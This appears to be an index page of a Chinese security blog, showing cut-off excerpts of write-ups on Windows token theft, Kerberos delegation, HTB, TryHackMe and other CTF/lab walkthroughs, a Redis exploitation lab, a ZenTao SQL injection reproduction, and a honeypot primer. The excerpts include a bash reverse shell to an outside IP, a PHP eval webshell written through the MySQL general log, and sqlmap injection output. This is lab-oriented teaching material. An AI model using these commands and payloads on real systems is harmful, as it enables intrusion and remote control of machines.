内网渗透-令牌窃取
内网渗透-令牌窃取前言本来应该早些写的,但想来想去令牌窃取没太多东西,就慢慢给忘了,今天来补一下。
令牌窃取主要就是用msf、cs还有incognito.exe
令牌令牌是系统的临时密钥,相当于账号和密码,用来决定是否允许此次请求和判断是属于哪一个用户的。它允许用户在不提供密码或者其他凭证的前提下,访问网络和资源。这些令牌将持续存在于系统之中,除非系统重新启动。令牌最大的特点是随机性、不可预测,黑客和软件均无法猜测出令牌。
令牌的种类有很多,如:
(1)访问令牌(Access Tokem):表示访问控制操作系统的对象。
(2)会话令牌(Session Token):是交互会话中唯一身份标识符。
(3)密保令牌(Scecurity Token):又称认证令牌或硬件令牌,是一种计算机身份检验的物理设备。
Windows的Access Token也有两种类型,如:
(1)授权令牌(Delegation Tokens):它支持交互式登录,例如远程桌面、用户桌面访问。
(2)模拟令牌(Impersonation Tokens):它支持非交互式的绘画,例如访问目标共享文件。
两种令牌会在系统重启后 ...
域渗透之委派攻击
内网渗透-域渗透之委派攻击前置知识在介绍委派之前需要了解Kerberos认证,在前面白银票据和黄金票据哪已经学习过了,这里就简单说一下
委派,委托嘛,就是张三委托小明去做一件事:张三委托小明去拿个快递,委托小明去买水果…
在Kerberos认证系统里,也就是张三委托Web系统,让WEB系统去访问文件系统,去访问图片系统等等,是将域用户的权限委派给服务账号,委派之后,服务账号就可以以域用户的身份去做域用户能够做的事,危害就是攻击者可以利用委派功能结合其他漏洞进行组合攻击,从而获取本地管理员权限甚至域管理员权限。
委派委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等)。
委派包含三种方式:
非约束委派(Unconstrained Delegation, UD)
约束委派(Constrained Delegation, CD)
基于资源的约束委派(Resource Based Constrained Delegation, RBCD)
简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。约束委派通过S ...
HTB之旅
ArchetypeWhich TCP port is hosting a database server?
1443
What is the name of the non-Administrative share available over SMB?
1smclient -N -L ip
backups
What is the password identified in the file on the SMB share?
M3g4c0rp123
What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
一眼就看出来
mssqlclient.py
What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
xp_cmds ...
2025 CSICN&CCB Half-Final
2025 CSICN&CCB Half-Final本篇转载于N0waybackhttps://mp.weixin.qq.com/s/0e8avtn3o_jZJbh3UDUdzw
AWDPWebrng-assistant(Cain、chu0)FIX抽象check脚本,我修泥木
BREAK审计和分析代码后,整体思路如下:
通过/register和/login路由获取session
通过添加 X头,越权访问/admin路由
通过/admin/model_ports路由,将default的端口改为6379,让我们可以执行redis-cli语句
通过/ask路由,进入generate_prompt(question)函数,从而实现模板匹配
审计模板类PromptTemplate,发现缓存机制函数,如果第一次尝试读取模板,那么从文件中读;之后每次读,都是从数据库中
1234567891011@staticmethoddef get_template(template_id):prompt_key = f"prompt ...
TryHackMe-TryHack3M:Bricks Heist
TryHackMe-TryHack3M: Bricks Heistflag01What is the content of the hidden .txt file in the web folder?
访问ip会跳转bricks.thm(提前编辑好/etc/hosts)
1nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm
发现存在wordpress
wpscan插件扫一扫
使用了bricks主题
尝试搜索相关漏洞https://github.com/Chocapikk/CVE-2024-25600
脚本利用
反弹shell
1bash -c 'exec bash -i &>/dev/tcp/10.21.148.202/9999 <&1'
拿到flag1
flag02What is the name of the suspicious process?
1systemctl list-units --type=service --state=run ...
AWDP
0402484f73738aba103156847cc03f18e7195a3a4f2c27ca54b557ed675a0fa1510c6e8de4bb779ed2beeff3f81b781f7450a18789ac3ed38bf2c73a4aa9ce8bfcbab06598295e13676db7623abc5750bae0cb0b10fed3635cfd4f7c9d2a50c1be952f0d402f1d92ad198bdbf4bb44a74ab35b62db696b059415f2eef9eccd64b7a8382f724433a7ee5cfc37cb3f7e0fa66a50ef6a5ed99094576c242d949e5d950bce5b2100e04dd3184f0e3593ff6422e16509423729a6e83f182fcc951304f059c8b3ac795f9006d3b9eac5a718192614a36e61b522a93c0892fdccd6e1e0a25626b5a1f59ca4fc1fc6c2c08bd53119fc4da0701d08707 ...
春秋云境-MagicRelay
春秋云境-MagicRelayflag01
新版fscan是好看哈
发现redis版本是3.0.504
MDUT连接
通过文件路径可以看出是windows系统,对于windows下的获取权限的方式,网上并不是很多,但是对于Redis未授权漏洞的利用,其最根本的原理就是写文件的利用,大致有以下几种 1、能够获取web绝对路径的,直接写入webshell 2、写入启动项 3、写入mof、dll劫持等
没有web服务,webshell也就没法写了,启动项的话
windows下的开机启动项的目录为
1C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/
12config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"靶机无法重启,无法用启动项
这里无法执行
写入MOF 但是版本靶机版本是win2019 要求 ...
禅道开源版Search模块的wordssql注入漏洞
禅道开源版21.4search模块的wordssql注入漏洞前言最近在网上看到了相关漏洞,最近也闲来无事,想着跟着来复现一下。
影响版本<=21.4(禅道开源版最新版)
漏洞复现环境搭建
123dockerpulleasysoft/zentao:21.4mkdirzentao21.4&&cdzentao21.4dockerrun-d-v./data:/data-p8082:80-eMYSQL_INTERNAL=true-eREDIS_INTERNAL=trueeasysoft/zentao:21.4
登录进后台首页后,在右下角的搜索输入框里随便输入,然后访问搜索结果
正常显示没有问题
在word处加入单引号出现报错
发现存在sql注入漏洞,
123456789101112131415sqlmapresumedthefollowinginjectionpoint(s)fromstoredsession:---Parameter:words(GET)Type:error-basedTitle:MySQL>=5.0ANDerror-based-W ...
浅识蜜罐
浅识蜜罐蜜罐是什么?蜜罐蜜罐,从名字上来看就像是一个盛有蜂蜜的罐子,吸引着他人来吃蜜,进来吃蜜了就掉进了陷阱。本质上就是一个设计好的陷阱。放在网安方面来说其实是一种主动防御技术,通过主动的暴露一些漏洞、设置一些诱饵来引诱攻击者进行攻击,从而可以对攻击行为进行捕获和分析。
常见的蜜罐低交互蜜罐(Low-Interaction Honeypot)Honeyd功能:模拟多种服务(如HTTP、SSH、Telnet),可自定义响应规则。
攻击案例:攻击者扫描到一台开放22端口(SSH)的主机,尝试用常见弱密码(如admin:admin)登录,发现登录成功但执行ls命令后返回空目录,且无法上传文件。
判断方法:使用nc连接端口后发送随机数据,观察是否返回固定Banner(如”SSH-2.0-Honeyd”)。
执行uname -a命令,蜜罐可能返回伪造的系统信息(如内核版本与真实系统矛盾)。
Kippo
功能:模拟SSH服务,记录暴力破解和攻击者输入的Shell命令。
攻击案例:攻击者通过SSH连接后尝试执行wget http://恶意IP/backdoor.sh,蜜罐会记录该操作但实际不会下载文 ...
PT-4
PT-4flag01首先进行信息搜集
密码猜测是root/cyberstrikelab
1select @@plugin_dir
1show variables like 'secure%';
发现secure_file_priv为空,说明我们没法打udf了
尝试去load_file一下
1234set global general_log ="ON"; #开启日志详解set global general_log_file='C:\\www\\a.php'; #设置路径select'<?php @eval($_POST[123]);?>';
再次访问发现权限不允许,应该是主机有杀软给杀死了,换个路径写个免杀马
12set global general_log_file='C:\\www\\1.php';select "<?php $a="a"."s"; $b="s".&qu ...